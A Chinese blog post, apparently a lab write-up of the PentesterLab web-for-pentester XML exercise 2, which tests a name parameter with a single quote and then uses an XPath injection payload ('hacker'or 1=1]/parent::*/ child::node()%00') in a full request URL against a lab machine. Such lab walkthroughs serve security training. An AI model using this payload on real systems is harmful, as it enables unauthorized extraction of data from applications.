首页 > 其他分享 >PentestLab-web安全XML测试-EXP2

PentestLab-web安全XML测试-EXP2

时间:2023-04-13 18:02:49浏览次数:45  
标签:XML web node name xml EXP2 192.168 http payload


我们打开靶机

选择“example 2”


PentestLab-web安全XML测试-EXP2_php


观察页面


PentestLab-web安全XML测试-EXP2_单引号_02

我们尝试修改name参数


http://192.168.20.157/xml/example2.php?name=hacker%27


PentestLab-web安全XML测试-EXP2_单引号_03


添加单引号报错

存在闭合的可能性


网上大神payload


hacker'or 1=1]/parent::*/ child::node()%00


完整的payload为


http://192.168.20.157/xml/example2.php?name=hacker%27or%201=1]/parent::*/%20child::node()%00


结果


PentestLab-web安全XML测试-EXP2_单引号_04


我们打开靶机

观察源码


PentestLab-web安全XML测试-EXP2_xml_05


上面的payload闭合了xpath参数

标签:XML,web,node,name,xml,EXP2,192.168,http,payload
From: https://blog.51cto.com/apple0/6188293

相关文章

  • javaweb验证码
    publicclassmyfunction{publicstaticStringgetRandString(intlength){Stringstr="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";Randomrandom=newRandom();StringBuffersb=newStringBuffe......
  • Go For Web:踏入Web大门的第一步——Web 的工作方式
    前言:本文作为解决如何通过Golang来编写Web应用这个问题的前瞻,对Golang中的Web基础部分进行一个简单的介绍。目前Go拥有成熟的Http处理包,所以我们去编写一个做任何事情的动态Web程序应该是很轻松的,接下来我们就去学习了解一些关于Web的相关基础,了解一些概念,以及......
  • 【web 开发基础】PHP 中的特殊流程控制(continue) -PHP 快速入门 (21)
    continue语句continue语句只能用于循环语句内部,功能是跳过本次循环继续执行下一次循环结构,而不终止整个循环的执行。在while和do...while语句中,continue语句跳转到循环条件处开始继续执行,对于for循环随后的动作是变量更新。流程图如下:continue的语法如下:continue[label];可选的......
  • 在idea运行maven项目 将mybatis的接口与接口对应xml文件放在同一个包下,启动时无法找到
    在项目的在pom文件中引入如下<resources><resource><directory>src/main/java</directory><excludes><exclude>**/*.java</exclude></excludes></resource>......
  • springboot 整合 webservice服务
    目录webservice百科创建一个springboot项目并导入相关依赖编写webservice接口编写实现类发布webservice浏览器访问postman调用在前一段时间用到了webservice服务,今天整理了一下,记录下来。webservice百科WebService是一个平台独立的,低耦合的,自包含的、基于可......
  • 微信小程序嵌套的webview页面实现导航,可跳转高德百度等app
    需求:微信小程序中使用webview嵌套了h5页面,h5页面中有经纬度,需要实现唤醒高德app。实现思路:此处h5未配置wxSDK,无法直接使用openLocation,所以将经纬度传给小程序,map页面为跳转中间页,再实现打开地图页面。h5://高德地图导航constaMapNavigate=(address,lng,lat)=>{......
  • webServlet添加数据报错500
     新建数据库文件,之后跳转出现问题,发现是数据库问题。字符不匹配 代码里是utf-8,将字符修改为utf-8,顺序为utf8之后可以 ......
  • xml
    1、介绍xml指可扩展标记语言eXtensiblemarkuplanguage,是一种标记语言。xml被设计用来传输和存储数据,不用于表现和展示数据,HTML则用来表现数据。xml在线格式化:https://c.runoob.com/front-end/710/2、语法(1)xml必须包含根元素,它是其他所有元素的父元素(2)xml声明为可选部......
  • 微信小程序 web-view在校验合法域名后视频不能播放
    异常 注:视频资源在小程序的服务器上  原因:web-view请求的外网资源需要在小程序的后台配置业务域名才能访问,并将验证文件放置在服务器根目录下在配置业务域名时遇到一个问题是,业务域名配置不能带端口,请求的服务器资源的域名带端口,校验文件没法放置到指定域名位置下,后又在......
  • 4、Web前端学习规划:JavaScript - 学习规划系列文章
          JavaScript作为Web前端里的第3重要的语言,笔者认为该重点进行学习。因为JavaScript衍生出来的框架和类库有不少,而且很强大。所以JavaScript的学习要抓好重点,在基本的语法及应用上学习相关的框架和类库,更好的为Web前端的开发应用做好准备。 1、简介;JavaSc......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99